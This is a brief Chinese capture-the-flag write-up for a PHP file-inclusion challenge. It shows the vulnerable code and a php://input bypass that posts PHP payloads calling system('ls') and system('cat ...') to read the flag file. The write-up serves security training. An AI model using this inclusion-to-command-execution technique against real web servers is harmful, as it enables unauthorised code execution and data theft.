Web_php_include 攻防世界

复制代码
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环
    $page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>

综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参

准备好一个Firefox 一个max hackbar

通过php伪协议php://input

首先post传入第一个命令 ,这个命令用来展开目录

复制代码
<php
system("ls")
?>

随后得到fl4gisisish3r3.php 一般这种文件就是flag,

我们使用

复制代码
<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是

相关推荐
小白勇闯网安圈17 分钟前
supersqli、web2、fileclude、Web_python_template_injection
python·网络安全·web
小白勇闯网安圈4 小时前
Training-WWW-Robots、command_execution、baby_web、xff_referer
网络安全·web
wyjcxyyy6 小时前
Polar-MISC-WEB(困难)
web·ctf·misc·polar
小白勇闯网安圈6 小时前
unserialize3、php_rce、Web_php_include、warmup、NewsCenter
sql·网络安全·web
码农12138号1 天前
服务端请求伪造-SSRF 学习笔记
笔记·web安全·网络安全·ctf·ssrf·服务端请求伪造
漏洞文库-Web安全1 天前
AWD比赛随笔
开发语言·python·安全·web安全·网络安全·ctf·awd
小白勇闯网安圈1 天前
file_include、easyphp、ics-05
网络安全·php·web
这儿有一堆花1 天前
汇率更新背后的残酷逻辑
web
wgego1 天前
Polar靶场web 随写笔记
笔记·web
白帽子黑客杰哥1 天前
CTF Web题目常用考点与解题技巧合集
前端·数据库·web安全·网络安全·ctf·信息收集